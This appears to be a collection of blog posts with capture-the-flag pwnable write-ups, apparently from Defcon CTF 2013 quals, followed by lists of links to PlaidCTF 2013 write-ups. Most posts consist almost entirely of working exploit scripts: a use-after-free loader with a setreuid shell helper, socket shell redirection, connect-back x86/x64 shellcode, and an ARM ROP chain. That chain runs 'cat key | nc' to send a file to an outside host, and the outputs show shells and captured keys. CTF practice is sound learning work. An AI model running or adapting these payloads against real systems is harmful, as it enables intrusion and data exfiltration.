Category : Pwnables


movie_talk

 

Summary : signal handler, use-after-free, lift esp to argv



loader.c 

#include <stdio.h>

#define RET "\xbb\x8b\x04\x08"

#define RET16 RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET

#define EXECL "\x90\x42\x0e\x40"

#define BINARY "\x74\x81\x04\x08" // &"GNU"


char *args[] = {RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16   EXECL "AAAA" BINARY, "", "", "", "", "", "", "", "", "", ""};


int main(int argc, char **argv, char **envp)

{

execve("./movie_talk",args, envp);

} 



GNU.c

#include <stdio.h>


int main()

{

setreuid(geteuid(), geteuid());

execl("/bin/sh","sh",0);

} 



Exploit

#!/usr/bin/python


from struct import pack

import os

import pexpect

import time


p = lambda x : pack("<L", x)


lift_esp = 0x400878c2    # add $0x81bc,%esp;  ret;


pp = pexpect.spawn("/home/movie_talk/loader")

pp.expect(".*")

pp.sendline("1")

pp.sendline("movie1")

pp.sendline("1")

pp.sendline("0")


pp.expect(".*")

pp.sendline("1")

pp.sendline("movie2")

pp.sendline("1")

pp.sendline("0")


time.sleep(4)

os.system("kill -3 %d" %pp.pid)


pp.expect(".*")

pp.sendline("1")

pp.sendline(p(lift_esp)+"a"*14)

pp.sendline("1")

pp.sendline("0")


pp.expect(".*")

pp.sendline("3")

pp.interact()



root@ubuntu:/home/movie_talk# ulimit -s unlimited

root@ubuntu:/home/movie_talk# ./exploit.py 

3

movie name: rating [1-100]: film rate [0,12,15,19]: 1. movie addtion

2. movie deletion

3. my movie list

4. quit

: [*] movie list =>

$ id

uid=1016(movie_talk) gid=0(root) egid=1016(movie_talk) groups=1016(movie_talk),0(root)

$         



WRITTEN BY
pwn3r_45

트랙백  0 , 댓글  0개가 달렸습니다.

Category : Pwnables 


givemeshell

 

Summary : 5byte command


Exploit

#!/usr/bin/python


from socket import *


HOST = "192.168.123.134"

PORT = 7879


cmd = ""


s = socket(AF_INET, SOCK_STREAM)

s.connect((HOST, PORT))

s.send("sh<&4")

s.send("sh>&4\n")

while 1:

cmd = raw_input("$ ")

if cmd == "exit":

break

else:

s.send(cmd+"\n")

print s.recv(1024)

s.close()



root@ubuntu:~/givemeshell# ./exploit.py 

$ id

uid=1005(givemeshell) gid=1005(givemeshell) groups=1005(givemeshell) 





WRITTEN BY
pwn3r_45

트랙백  0 , 댓글  0개가 달렸습니다.
secret


pwnable (0x41414141)

- pwnable1 : http://pwn3r.tistory.com/entry/Defcon-CTF-2013-qual-pwnable1

- pwnable2 : (not yet)

- pwnable3 : http://pwn3r.tistory.com/entry/Defcon-CTF-2013-qual-pwnable3

- pwnable4 : (not yet)

- pwnable5 : (not yet)


shellcode (\xff\xe4\xcc)

- shellcode1 : (not yet)

- shellcode2 : http://pwn3r.tistory.com/entry/Defcon-CTF-2013-qual-shellcode2

- shellcode3 : http://pwn3r.tistory.com/entry/Defcon-CTF-2013-qual-shellcode3

- shellcode4 : http://pwn3r.tistory.com/entry/Defcon-CTF-2013-qual-shellcode4

- shellcode5 : (not yet)




WRITTEN BY
pwn3r_45

트랙백  0 , 댓글  0개가 달렸습니다.
secret

Category : Pwnable (\xff\xe4\xcc)


penser


Summary : unicode shellcode, overwrite below byte


Exploit

#!/usr/bin/python


from socket import *

from struct import pack

import time


HOST = "penser.shallweplayaga.me"

PORT = 8273


"""

51 # push %rcx

00 45 00 # align

59 # pop %rcx

00 45 00

52 # push %rdx

00 45 00

58 # pop %rax

00 45 00

32 00 # xor (%rax), %al

50 # push %rax

00 45 00

5a # pop %rdx

00 45 00

59 # pop %rcx

00 45 00

59 # pop %rcx

00 45 00

59 # pop %rcx

00 45 00

59 # pop %rcx

00 0a # add    %cl,(%rdx)          

00 45 00

58 # pop %rax

00 45 00

50 # push %rax

00 45 00

58 # pop %rax

00 45 00

50 # push %rax

00 45 00

58 # pop %rax

00 45 00

50 # push %rax

00 45 00

58 # pop %rax

00 45 00

50 # push %rax

00 45 00

58 # pop %rax

00 45 00

50 # push %rax

00 4b 00 #### will be replaced

"""

stage0 = "\x51\x45\x59\x45\x52\x45\x58\x45\x32\x50\x45\x5a\x45\x59\x45\x59\x45\x59\x45\x59\x0a\x45\x58\x45\x50\x45\x58\x45\x50\x45\x58\x45\x50\x45\x58\x45\x50\x45\x58\x45\x50\x4b\x00\x00"


shellcode = "\x90"*0x100 +\

"\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05\x48\x97" +\

"\x48\xb9\x02\x00\x7a\x69\x00\x00\x00\x00\x51\x48\x89\xe6" +\

"\x6a\x10\x5a\x6a\x2a\x58\x0f\x05\x6a\x03\x5e\x48\xff\xce" +\

"\x6a\x21\x58\x0f\x05\x75\xf6\x6a\x3b\x58\x99\x48\xbb\x2f" +\

"\x62\x69\x6e\x2f\x73\x68\x00\x53\x48\x89\xe7\x52\x57\x48" +\

"\x89\xe6\x0f\x05"


s = socket(AF_INET, SOCK_STREAM)

s.connect((HOST, PORT))

s.send("\xc3\x02\x00\x00")

time.sleep(0.5)

s.send(stage0+shellcode)

time.sleep(0.5)

s.close()




root@ubuntu:~# ./exploit.py


--------------------------------------------------------------


root@ubuntu:~# nc -lv 31337

Connection from 54.226.204.186 port 31337 [tcp/*] accepted

id

uid=1001(penser) gid=1001(penser) groups=1001(penser)

cat key

The key is: TBDHelloooookdkdkiekdiekdiek 



WRITTEN BY
pwn3r_45

트랙백  0 , 댓글  0개가 달렸습니다.
secret

Category : Pwnable (\xff\xe4\xcc)

(empty)


Summary : short shellcoding, reuse pointer in ecx


/*

00A21E80     8B09           MOV ECX,DWORD PTR DS:[ECX]

00A21E82     8D41 05        LEA EAX,DWORD PTR DS:[ECX+5]

00A21E85     66:8138 4141   CMP WORD PTR DS:[EAX],4141

00A21E8A    ^75 F4          JNZ SHORT 00A21E80

00A21E8C     C3             RETN

*/

root@ubuntu:~# (python -c 'print "\x8b\x09\x8d\x41\x05\x66\x81\x38\x41\x41\x75\xf4\xc3"')| nc linked2.shallweplayaga.me 22222

List built.  Send me your shellcode.  Max size: 16

AAAThe key is: Who says ESP isn't general purpose!?!?



WRITTEN BY
pwn3r_45

트랙백  0 , 댓글  0개가 달렸습니다.
secret

Category : Pwnable (\xff\xe4\xcc)


blackjack

 

Summary : generate shellcode with game


Exploit

#!/usr/bin/env python


import socket

import time

import thread

import re



HOST = "blackjack.shallweplayaga.me"

PORT = 6789


SHELLCODE = "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b\x5e\x68\x00\x00\x00\x00\x66\x68\x7a\x69\x66\x53\x6a\x10\x51\x50\x89\xe1\x43\x6a\x66\x58\xcd\x80\x59\x87\xd9\xb0\x3f\xcd\x80\x49\x79\xf9\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"

def receiver(s):

while(1):

try:

data = s.recv(1024)

except:

exit()

print data

time.sleep(0.1)


s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

s.connect((HOST, PORT))

thread.start_new_thread(receiver,(s,))

time.sleep(0.5)

s.send("\x90\x0c\x90\x0c"+SHELLCODE+"\n")

s.send("65\nS\n21\nH\n1\nH\nS\n20\nS\n12\nH\nS\n1\nS\n85\nS\n85\nS\n85\nH\nS\n1\nS\n85\nS\n85\nS\n85\nS\n85\nH\nS\n1\nS\n1\nS\n85\nS\n1\nS\n85\nS\n1\nS\n85\nS\n1\nS\n85\nS\n85\nS\n85\nS\n125\nS\n60\nS\n32\nS\n1\nS\n28\nS\n1\nS\n85\nS\n85\nH\nS\n35\nH\nS\n1\nS\n23\nS\n18\nS\n-1\n")

time.sleep(0.5)

s.close()




WRITTEN BY
pwn3r_45

트랙백  0 , 댓글  0개가 달렸습니다.
secret

Category : Pwnables


ergab


Summary : signed integer, use-after-free, heap-spray, ASLR & DEP bypass



gen_answer_dict.py 

import re

from socket import *

from struct import pack, unpack


HOST = "lolergab.shallweplayaga.me"

PORT = 5000


def SaveFile(data):

f = open('dic.txt', 'r')

if f.read().find(data) != -1:

f.close()

return

f.close()


f = open('dic.txt', 'at')

f.write(data)

f.close()


def Attack(s):

data = s.recv(1024)

l = data.split('\n')

quest = l[0]

data = re.search('1\) (.*)', l[1])

choice = data.group(1)

s.send("1\n")

if s.recv(1024).find('Wrong!!') == -1:

SaveFile(quest + ":" + choice + "\n")

print 'OK'

return 0


def main():

s = socket(AF_INET , SOCK_STREAM)

s.connect((HOST , PORT))

Attack(s)

s.close()

if __name__ == '__main__':

while True:

main() 




leak_memory.py 

import re

from socket import *

from struct import pack, unpack

import time, sys


p = lambda x: pack("<L", x)


HOST = "lolergab.shallweplayaga.me"

#HOST = "192.168.0.171"

PORT = 5000


senddata = 0x3C9C


payload = ""

payload += "a"*0x0f+"\n"


def GetDatabase():

dic = {}

f = open('dic.txt', 'r')

for line in f:

line = line.strip('\n')

(quest, answer) = line.split(':')

#print dic, " ", quest, " ", answer

dic[quest] = answer

f.close()

return dic


def Attack(s):

dic = GetDatabase()

for _ in range(5):

data = s.recv(1024)

l = data.split('\n')

quest = l[0]

answer = dic[quest]

choice = 0

for i in range(1, 4+1):

if l[i].find(answer) != -1:

choice = i

break

s.send(str(choice) + '\n')

s.recv(1024)

print s.recv(1024)

time.sleep(1)

        raw_input(">")

s.send(payload)

time.sleep(1)

print s.recv(1024)

return 0


def main():

s = socket(AF_INET , SOCK_STREAM)

s.connect((HOST , PORT))

Attack(s)

s.close()

if __name__ == '__main__':

main() 



Exploit

import re

from socket import *

from struct import pack, unpack

import time, sys


p = lambda x: pack("<L", x)


HOST = "lolergab.shallweplayaga.me"

PORT = 5000


base = 0xb6f54000 # server

##base = 0xb6faf000 # local

system = 0xb6cbbbd8  # server

##system = 0xb6d19bd8 # local

sleep = 0xb6d1af30 # server

freespace = 0x0000d558

senddata = 0x3C9C

recvdata = 0x3DC4

command = "cat key | nc bean.b10s.org 31337\x00"


"""

.text:000045FC 07 00 A0 E1                             MOV     R0, R7

.text:00004600 08 10 A0 E1                             MOV     R1, R8

.text:00004604 0A 20 A0 E1                             MOV     R2, R10

.text:00004608 01 40 84 E2                             ADD     R4, R4, #1

.text:0000460C 33 FF 2F E1                             BLX     R3

.text:00004610 06 00 54 E1                             CMP     R4, R6

.text:00004614 F7 FF FF 1A                             BNE     loc_45F8

.text:00004618 F8 85 BD E8                             LDMFD   SP!, {R3-R8,R10,PC}

"""



payload = ""

payload += "a"*0x10

payload += p(base+0x00004618) # .text:00004618                 LDMFD   SP!, {R3-R8,R10,PC}

#############################

payload += p(base+0x00004624) # .text:00004624                 BX      LR

payload += p(0x00000000) * 2

payload += p(0x00000001)

payload += p(0x00000004) # r0

payload += p(base+freespace) # r1

payload += p(len(command)) # r2

############################

payload += p(base+0x000045FC)

############################

payload += p(0x000000de)

payload += p(0x11111111)*6

############################

#payload += p(sleep)

payload += p(base+recvdata)

###########################

payload += p(0x11111111)*7

##########################

payload += p(base+0x00004618) # .text:00004618                 LDMFD   SP!, {R3-R8,R10,PC}

###########################

payload += p(base+0x00004624) # .text:00004624                 BX      LR

payload += p(0x00000000)*2

payload += p(0x00000001)

payload += p(base+freespace)

payload += p(0x00000001)*2

###########################

payload += p(base+0x000045FC)

##########################

payload += p(0x11111111)*7

##########################

payload += p(system)

##########################

payload += "\n"


def GetDatabase():

dic = {}

f = open('dic.txt', 'r')

for line in f:

line = line.strip('\n')

(quest, answer) = line.split(':')

#print dic, " ", quest, " ", answer

dic[quest] = answer

f.close()

return dic


def Attack(s):

dic = GetDatabase()

for _ in range(5):

data = s.recv(1024)

l = data.split('\n')

quest = l[0]

answer = dic[quest]

choice = 0

for i in range(1, 4+1):

if l[i].find(answer) != -1:

choice = i

break

s.send(str(choice) + '\n')

s.recv(1024)

print s.recv(1024)

time.sleep(1)

s.send(payload)

s.send(command)

time.sleep(1)

print s.recv(1024)


def main():

s = socket(AF_INET , SOCK_STREAM)

s.connect((HOST , PORT))

Attack(s)

s.close()

if __name__ == '__main__':

main()




root@ubuntu:~# ./exploit.py


--------------------------------------------------------------------


root@ubuntu:~# nc -lv 31337

Connection from 131.247.27.200 port 80 [tcp/http] accepted

The key is: Hang on, I know what I need. Fish fingers. And custard. 




Co written with StolenByte


WRITTEN BY
pwn3r_45

트랙백  0 , 댓글  0개가 달렸습니다.
secret


Challenges

http://shell-storm.org/repo/CTF/PlaidCTF-2013/ 


Write-up

Pwnable

----------------------------------------------------

pork 

- http://pastie.org/7693773

- http://pwn3r.tistory.com/entry/Plaid-CTF-2013-pork

- http://bases-hacking.org/pork-pctf2013.html

- http://www.bases-hacking.org/pork-pctf2013.html


ropsaurusrex

- http://hackerschool.org/temp/pctf2013/ropasaurusrex_exp.py

- http://codezen.fr/2013/04/22/plaidctf-2013-pwnable-200-ropasaurusrex-write-up/

- http://pastie.org/7693791

- http://bases-hacking.org/ropasaurusrex-pctf2013.html

http://www.bases-hacking.org/ropasaurusrex-pctf2013.html


dynrpn

- http://eindbazen.net/2013/04/pctf-2013-dynrpn-pwnable-250/

- http://pwnies.dk/post/dynrpn-plaidctf-2013/


bunyans_revenge

- http://www.blue-lotus.net/plaidctf-2013-bunyans_revenge-writeup/

----------------------------------------------------



Binary

----------------------------------------------------

three eyed fish

- http://broot.ca/blog/plaidctf-three-eyed-fish-binary-100

http://f00l.de/blog/?p=1781


cone

- http://pastie.org/private/wpxsvcxllyryl9s8ffslqw

http://eindbazen.net/2013/04/pctf-2013-cone-binary-250-2/


hypercomputer-1

- http://f00l.de/blog/?p=1803


cnot

http://www.skullsecurity.org/blog/2013/epic-cnot-writeup-plaidctf


kavihk

- http://int3pids.blogspot.nl/2013/04/plaidctf-2013-kavihk-binary-400-write-up.html

http://pwnies.dk/post/kavihk-plaidctf-2013/


drmless

- http://int3pids.blogspot.nl/2013/04/plaidctf-2013-drmless-binary-250-write.html

------------------------------------------------------



Forensic

-------------------------------------------------------

cat_rar

http://www.mikelisi.me/2013/04/plaid-ctf-2013-catrar-write-up.html

-------------------------------------------------------


Web

-------------------------------------------------------

charsheet

- http://f00l.de/blog/?p=1761


servr

- http://www.bases-hacking.org/servr-pctf2013.html

-------------------------------------------------------



Crypto

-------------------------------------------------------

blech

http://leetmore.ctf.su/wp/plaidctf-2013-blech-crypto-200/


compression

- http://www.rajatswarup.com/blog/2013/04/21/plaidctf-2013-crypto-250-compression-writeup/

- http://dave.frop.net/plaid_ctf_2013_writeup_crypto_250_compression

http://eindbazen.net/2013/04/pctf-2013-compression-crypto-250/


giga

- http://r3dey3.com/2013/04/plaid-ctf-giga-crypto-250/

- http://eindbazen.net/2013/04/pctf-2013-giga-crypto-250/


cyrpto

- http://r3dey3.com/2013/04/plaidctf-crypto100/

http://eindbazen.net/2013/04/pctf-2013-cyrpto-crypto-100/

------------------------------------------------------



Misc

-------------------------------------------------------

Unnnnlucky

- http://magic-hat.ru/forum/viewtopic.php?pid=341#p341


Prove it

- http://eindbazen.net/2013/04/pctf-2013-prove-it-misc-150/


pyjail

- http://darksaber.tk/wapiflapi/pyjail_escape.py

http://blog.pnuts.tk/2013/04/plaidctf-pyjail-story-of-pythons-escape.html

- https://blog.inexplicity.de/plaidctf-2013-pyjail-writeup-part-i-breaking-the-sandbox.html

------------------------------------------------------- 


Another write up collection 

- http://devpsc.blogspot.fr/2013/04/plaid-ctf-2013-writeups-collection.html 




Keep updating..



WRITTEN BY
pwn3r_45

트랙백  0 , 댓글  0개가 달렸습니다.
secret